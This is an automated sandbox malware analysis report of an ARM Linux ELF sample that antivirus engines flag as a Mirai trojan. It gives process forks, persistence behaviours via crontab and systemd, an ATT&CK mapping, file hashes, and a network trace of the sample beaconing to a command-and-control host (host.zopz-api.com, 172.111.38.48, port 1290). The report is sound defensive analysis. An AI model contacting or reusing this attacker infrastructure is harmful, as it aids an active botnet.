Linux
Analysis Report
arm7.elf
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1558944 |
Start date and time: | 2024-11-20 01:00:17 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 5s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | arm7.elf |
Detection: | MAL |
Classification: | mal68.troj.linELF@0/4@3/0 |
- VT rate limit hit for: arm7.elf
Command: | /tmp/arm7.elf |
PID: | 5851 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | we kinda rocking ngl |
Standard Error: |
- system is lnxubuntu20
- arm7.elf New Fork (PID: 5853, Parent: 5851)
- arm7.elf New Fork (PID: 5855, Parent: 5853)
- arm7.elf New Fork (PID: 5857, Parent: 5853)
- arm7.elf New Fork (PID: 5859, Parent: 5853)
- arm7.elf New Fork (PID: 5861, Parent: 5853)
- sh New Fork (PID: 5867, Parent: 5861)
- sh New Fork (PID: 5868, Parent: 5867)
- sh New Fork (PID: 5870, Parent: 5867)
- sh New Fork (PID: 5871, Parent: 5867)
- sh New Fork (PID: 5872, Parent: 5867)
- sh New Fork (PID: 5877, Parent: 5867)
- sh New Fork (PID: 5869, Parent: 5861)
- arm7.elf New Fork (PID: 5878, Parent: 5853)
- sh New Fork (PID: 5883, Parent: 5878)
- systemd New Fork (PID: 5885, Parent: 5884)
- cleanup
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | ReversingLabs: |
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: |
Source: | Reads hosts file: | Jump to behavior |
Source: | Socket: | Jump to behavior |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File written: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | Directory: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior | ||
Source: | Chmod executable: | Jump to behavior |
Source: | Systemctl executable: | Jump to behavior |
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 File and Directory Permissions Modification | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Systemd Service | 1 Systemd Service | 1 Hidden Files and Directories | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Scripting | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
37% | ReversingLabs | Linux.Trojan.Mirai | ||
100% | Avira | EXP/ELF.Mirai.W |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
daisy.ubuntu.com | 162.213.35.24 | true | false | high | |
host.zopz-api.com | 172.111.38.48 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.111.38.48 | host.zopz-api.com | Reserved | 54540 | INCERO-HVVCUS | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
172.111.38.48 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
daisy.ubuntu.com | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
host.zopz-api.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
INCERO-HVVCUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | SystemBC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Process: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 3.7627880354948586 |
Encrypted: | false |
SSDEEP: | 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb |
MD5: | D86A1F5765F37989EB0EC3837AD13ECC |
SHA1: | D749672A734D9DEAFD61DCA501C6929EC431B83E |
SHA-256: | 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45 |
SHA-512: | 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/arm7.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 178 |
Entropy (8bit): | 4.358630015292201 |
Encrypted: | false |
SSDEEP: | 3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL |
MD5: | C3685F292213652676F734AB36C060EE |
SHA1: | 1D05F7F6302EC60E7990DE4BBE9180C149EFC731 |
SHA-256: | D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C |
SHA-512: | 7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/arm7.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 356 |
Entropy (8bit): | 4.9110117370593995 |
Encrypted: | false |
SSDEEP: | 6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7 |
MD5: | F03C70CD4C61A1852F9E19B8FB0D639C |
SHA1: | A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008 |
SHA-256: | AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90 |
SHA-512: | 6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 235 |
Entropy (8bit): | 5.100342823415771 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQLv8ZHGMQ5UYLtCFt3HY8jsHB:8QjHig8YeHLUHY8mB |
MD5: | 7AFEF51E1D6A676DAA9E0BCE51205E3F |
SHA1: | 0EAC4A09EB707322CBAB9C36BD6A783CDB66C20E |
SHA-256: | 862D93CBABE579883E89796FC365A78C7BEE7E3D29D2A564A02A791AF97E2FBC |
SHA-512: | A82A267DB8CBB437E2F3B74163CAB7A5035193BB39D5E5354F966730315940CBCEDA143FC599AC8364EC6355962013D97D976A9C571AF945BA86803480FAA48E |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.16176879166101 |
TrID: |
|
File name: | arm7.elf |
File size: | 99'492 bytes |
MD5: | 90337fe04cae0de9874bcdf2e04426d1 |
SHA1: | d7e3b11dbf5004e2bb4ad7cabcda8b907e822125 |
SHA256: | 329894206c4f4d8cea0da6ff75b98dbad800ae577acb1635b288afc61147f014 |
SHA512: | 2a210fe3de15b2581944b7e7b8970dbecf7d8bb7666e35032b602adaa37ec3bf38abc94d62595b8ef6b482243586cd2d5a7e18be94cfa2f3c1fd8dac73d50f68 |
SSDEEP: | 1536:7UnXyNAN6sT3FtlqaXl92IaJoqdvIYDfmlRA2iwApwNaOY7n+8G:vNRotl19ZaJoqdvIsoApwNaOs+8G |
TLSH: | 5CA3FA46A9819F02D4D622FAFBAE414933536FB8E3FA7101DD206F5423C69DB0E77612 |
File Content Preview: | .ELF..............(.........4...........4. ...(........p.n.......... ... ............................o...o...............p...p...p......(t...............p...p...p..................Q.td..................................-...L..................@-.,@...0....S |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 5 |
Section Header Offset: | 98772 |
Section Header Size: | 40 |
Number of Section Headers: | 18 |
Header String Table Index: | 17 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x80d4 | 0xd4 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x80f0 | 0xf0 | 0x155d4 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x1d6c4 | 0x156c4 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x1d6d8 | 0x156d8 | 0x17a3 | 0x0 | 0x2 | A | 0 | 0 | 8 |
.ARM.extab | PROGBITS | 0x1ee7c | 0x16e7c | 0x18 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ARM.exidx | ARM_EXIDX | 0x1ee94 | 0x16e94 | 0x120 | 0x0 | 0x82 | AL | 2 | 0 | 4 |
.eh_frame | PROGBITS | 0x27000 | 0x17000 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.tbss | NOBITS | 0x27004 | 0x17004 | 0x8 | 0x0 | 0x403 | WAT | 0 | 0 | 4 |
.init_array | INIT_ARRAY | 0x27004 | 0x17004 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.fini_array | FINI_ARRAY | 0x27008 | 0x17008 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.jcr | PROGBITS | 0x2700c | 0x1700c | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.got | PROGBITS | 0x27010 | 0x17010 | 0xac | 0x4 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x270bc | 0x170bc | 0x248 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x27304 | 0x17304 | 0x7124 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.comment | PROGBITS | 0x0 | 0x17304 | 0xe26 | 0x0 | 0x0 | 0 | 0 | 1 | |
.ARM.attributes | ARM_ATTRIBUTES | 0x0 | 0x1812a | 0x16 | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x18140 | 0x91 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
EXIDX | 0x16e94 | 0x1ee94 | 0x1ee94 | 0x120 | 0x120 | 4.5357 | 0x4 | R | 0x4 | .ARM.exidx | |
LOAD | 0x0 | 0x8000 | 0x8000 | 0x16fb4 | 0x16fb4 | 6.1303 | 0x5 | R E | 0x8000 | .init .text .fini .rodata .ARM.extab .ARM.exidx | |
LOAD | 0x17000 | 0x27000 | 0x27000 | 0x304 | 0x7428 | 4.2386 | 0x6 | RW | 0x8000 | .eh_frame .tbss .init_array .fini_array .jcr .got .data .bss | |
TLS | 0x17004 | 0x27004 | 0x27004 | 0x0 | 0x8 | 0.0000 | 0x4 | R | 0x4 | .tbss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 01:01:35.913738012 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:35.918627977 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:35.918685913 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:35.923738956 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:35.928596020 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:36.395116091 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:36.395188093 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:36.530791044 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:36.530920029 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:36.530920029 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:36.536062002 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:41.395808935 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:41.395860910 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:41.395970106 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:41.400746107 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:41.400796890 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:41.405608892 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:46.396688938 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:46.396744967 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:46.396781921 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:46.401663065 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:46.401710033 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:46.406578064 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:51.397710085 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:51.397794962 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:51.402793884 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:51.402839899 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:51.407665968 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:56.397881985 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:56.397974968 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:56.402899981 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:01:56.402940989 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:01:56.407825947 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:01.398689032 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:01.398789883 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:01.403683901 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:01.403734922 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:01.408600092 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:06.399027109 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:06.399164915 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:06.404033899 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:06.404083014 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:06.408909082 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:11.399543047 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:11.399651051 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:11.404582024 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:11.404635906 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:11.409595013 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:16.400772095 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:16.400885105 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:16.405916929 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:16.405971050 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:16.410846949 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:21.400799036 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:21.400935888 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:21.405860901 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:21.405982018 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:21.410949945 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:26.410423040 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:26.410885096 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:26.415802002 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:26.415947914 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:26.420887947 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:31.401403904 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:31.401582956 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:31.406529903 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:31.406631947 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:31.411490917 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:36.402008057 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:36.402133942 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:36.407624006 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:36.407686949 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:36.413266897 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:41.402807951 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:41.403100014 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:41.407979012 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:41.408049107 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:41.412909985 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:46.403655052 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:46.403815031 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:46.408703089 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:46.408770084 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:46.413676977 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:51.403980970 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:51.404103994 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:51.409014940 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:51.409063101 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:51.413943052 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:56.404103994 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:56.404369116 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:56.409310102 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:02:56.409473896 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:02:56.414388895 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:01.405050993 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:01.405174971 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:01.410088062 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:01.410228968 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:01.415091991 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:06.406028986 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:06.406323910 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:06.411187887 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:06.411303043 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:06.416162968 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:11.407700062 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:11.407975912 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:11.412884951 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:11.412966967 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:11.417825937 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:16.408001900 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:16.408174038 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:16.413139105 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:16.413213968 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:16.418139935 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:21.408674002 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:21.408946991 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:21.413813114 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:21.413870096 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:21.418829918 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:26.409131050 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:26.409229040 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:26.414136887 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:26.414344072 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:26.419224024 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:31.409723997 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:31.409861088 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:31.414720058 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Nov 20, 2024 01:03:31.414771080 CET | 51014 | 1290 | 192.168.2.15 | 172.111.38.48 |
Nov 20, 2024 01:03:31.419599056 CET | 1290 | 51014 | 172.111.38.48 | 192.168.2.15 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 01:01:35.893306971 CET | 59963 | 53 | 192.168.2.15 | 1.1.1.1 |
Nov 20, 2024 01:01:35.904416084 CET | 53 | 59963 | 1.1.1.1 | 192.168.2.15 |
Nov 20, 2024 01:01:40.676748991 CET | 45127 | 53 | 192.168.2.15 | 1.1.1.1 |
Nov 20, 2024 01:01:40.676883936 CET | 60680 | 53 | 192.168.2.15 | 1.1.1.1 |
Nov 20, 2024 01:01:40.683788061 CET | 53 | 60680 | 1.1.1.1 | 192.168.2.15 |
Nov 20, 2024 01:01:40.683821917 CET | 53 | 45127 | 1.1.1.1 | 192.168.2.15 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 20, 2024 01:01:35.893306971 CET | 192.168.2.15 | 1.1.1.1 | 0x255a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 01:01:40.676748991 CET | 192.168.2.15 | 1.1.1.1 | 0xade8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 01:01:40.676883936 CET | 192.168.2.15 | 1.1.1.1 | 0x76cd | Standard query (0) | 28 | IN (0x0001) | false |
